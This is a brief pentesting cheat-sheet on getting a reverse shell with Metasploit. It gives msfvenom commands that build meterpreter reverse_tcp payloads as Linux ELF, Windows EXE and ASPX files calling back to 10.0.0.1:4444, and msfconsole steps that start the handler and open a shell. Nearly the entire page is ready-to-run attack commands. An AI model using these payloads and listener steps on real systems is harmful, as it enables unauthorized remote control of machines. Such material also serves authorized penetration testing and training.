Reverse Shell with Metasploit
Last modified: 2023-04-08
Privilege Escalation
Reverse Shell
We can create a reverse shell payload using Msfvenom and listen for reverse connection with Msfconsole.
1. Create a Payload using MsfVenom
# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf
# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f aspx -o shell.aspx
2. Start Listener using MsfConsole
msfconsole
msf> use exploit/multi/handler
# Linux
msf> set payload linux/x86/meterpreter/reverse_tcp
# Windows
msf> set payload windows/meterpreter/reverse_tcp
msf> set lhost 10.0.0.1
msf> set lport 4444
msf> run
meterpreter> shell